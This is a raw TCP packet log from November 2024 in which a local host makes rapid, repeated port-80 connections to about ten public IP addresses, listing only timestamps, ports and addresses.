                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.475327969 CET5022480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.480431080 CET805022434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.480525017 CET5022480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.484277964 CET5022480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.484304905 CET5022480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.489239931 CET805022434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.489599943 CET805022434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.529273987 CET805022218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.529418945 CET5022280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.535466909 CET805022218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.535554886 CET5022280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.281964064 CET6007580192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.287084103 CET806007518.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.287179947 CET6007580192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.287333012 CET6007580192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.287368059 CET6007580192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.292139053 CET806007518.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.292265892 CET806007518.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.310226917 CET805022434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.310440063 CET5022480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.316081047 CET805022434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.316189051 CET5022480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.323466063 CET6007680192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.328540087 CET806007647.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.328671932 CET6007680192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.328886032 CET6007680192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.328933954 CET6007680192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.333985090 CET806007647.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.333997965 CET806007647.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.131247044 CET806007518.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.131488085 CET6007580192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.137603045 CET806007518.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.137715101 CET6007580192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.142724991 CET6007780192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.148947954 CET806007734.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.149064064 CET6007780192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.149171114 CET6007780192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.149194002 CET6007780192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.154776096 CET806007734.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.154807091 CET806007734.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.724160910 CET6007680192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.728338003 CET6007880192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.733354092 CET806007847.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.733443975 CET6007880192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.733603001 CET6007880192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.733647108 CET6007880192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.738754988 CET806007847.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.738768101 CET806007847.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.990668058 CET806007734.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.990861893 CET6007780192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.996282101 CET806007734.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.996340990 CET6007780192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.002470016 CET6007980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.008332014 CET806007918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.008424997 CET6007980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.008528948 CET6007980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.008544922 CET6007980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.013501883 CET806007918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.013520002 CET806007918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.686304092 CET806007918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.686610937 CET6007980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.692065954 CET806007918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.692246914 CET6007980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.699731112 CET6008080192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.704803944 CET806008035.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.704955101 CET6008080192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.705120087 CET6008080192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.705136061 CET6008080192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.710163116 CET806008035.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.710177898 CET806008035.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.203522921 CET806007847.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.203766108 CET6007880192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.209115982 CET806007847.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.209217072 CET6007880192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.217799902 CET6008180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.222934961 CET806008154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.223058939 CET6008180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.223222971 CET6008180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.223246098 CET6008180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.228148937 CET806008154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.228179932 CET806008154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.548316956 CET806008035.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.548460007 CET6008080192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.553857088 CET806008035.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.553961992 CET6008080192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.568451881 CET6008280192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.573447943 CET806008234.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.573544025 CET6008280192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.573704958 CET6008280192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.573704958 CET6008280192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.578636885 CET806008234.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:49.578670979 CET806008234.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.071945906 CET806008154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.072170019 CET6008180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.078239918 CET806008154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.078315020 CET6008180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.087101936 CET6008380192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.092578888 CET80600833.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.092694044 CET6008380192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.092813015 CET6008380192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.092835903 CET6008380192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.098033905 CET80600833.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.098051071 CET80600833.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.405528069 CET806008234.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.405765057 CET6008280192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.411744118 CET806008234.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.411832094 CET6008280192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.419342041 CET6008480192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.424280882 CET806008444.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.424441099 CET6008480192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.424583912 CET6008480192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.424583912 CET6008480192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.429465055 CET806008444.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.429600954 CET806008444.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.756838083 CET80600833.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.757148981 CET6008380192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.762866974 CET80600833.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.763000965 CET6008380192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.772233963 CET6008580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.777394056 CET806008518.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.777544022 CET6008580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.777693033 CET6008580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.777715921 CET6008580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.782619953 CET806008518.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:50.782636881 CET806008518.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.102632046 CET806008444.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.102776051 CET6008480192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.108341932 CET806008444.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.108411074 CET6008480192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.114757061 CET6008680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.119740963 CET806008654.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.119859934 CET6008680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.119946003 CET6008680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.119961023 CET6008680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.125011921 CET806008654.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.125025988 CET806008654.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.479319096 CET806008518.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.479554892 CET6008580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.484971046 CET806008518.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.485044956 CET6008580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.493257999 CET6008780192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.498194933 CET806008718.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.498270988 CET6008780192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.498421907 CET6008780192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.498442888 CET6008780192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.503333092 CET806008718.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.503357887 CET806008718.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.724163055 CET6008780192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.727503061 CET6008880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.732619047 CET806008818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.732728004 CET6008880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.732872963 CET6008880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.732897997 CET6008880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.738091946 CET806008818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.738106966 CET806008818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.958764076 CET806008654.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.958919048 CET6008680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.964991093 CET806008654.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.965061903 CET6008680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.971302986 CET6008980192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.976886034 CET806008935.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.976954937 CET6008980192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.977080107 CET6008980192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.977107048 CET6008980192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.982826948 CET806008935.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.982856989 CET806008935.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.567622900 CET806008818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.568088055 CET6008880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.573301077 CET806008818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.573714018 CET6008880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.581999063 CET6009080192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.586973906 CET80600903.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.589231968 CET6009080192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.589467049 CET6009080192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.589467049 CET6009080192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.594373941 CET80600903.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.594387054 CET80600903.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.804696083 CET806008935.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.805666924 CET6008980192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.811003923 CET806008935.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.811933041 CET6008980192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.821659088 CET6009180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.826656103 CET806009154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.829657078 CET6009180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.829658031 CET6009180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.829658031 CET6009180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.834676981 CET806009154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.834777117 CET806009154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.262048960 CET80600903.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.264925957 CET6009080192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.270381927 CET80600903.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.270992041 CET6009080192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.278034925 CET6009280192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.282902002 CET806009235.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.283020020 CET6009280192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.283142090 CET6009280192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.283155918 CET6009280192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.288050890 CET806009235.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.288064003 CET806009235.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.653177977 CET806009154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.653661966 CET6009180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.658899069 CET806009154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.659583092 CET6009180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.665009022 CET6009380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.670007944 CET806009334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.670181990 CET6009380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.670300961 CET6009380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.670336008 CET6009380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.675061941 CET806009334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.675345898 CET806009334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.115911961 CET806009235.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.116204977 CET6009280192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.122642994 CET806009235.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.122785091 CET6009280192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.130251884 CET6009480192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.135231018 CET806009418.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.135332108 CET6009480192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.135525942 CET6009480192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.135525942 CET6009480192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.140463114 CET806009418.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.140476942 CET806009418.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.508440018 CET806009334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.508641958 CET6009380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.513933897 CET806009334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.514005899 CET6009380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.522222996 CET6009580192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:54.527204990 CET806009547.129.31.212192.168.2.7
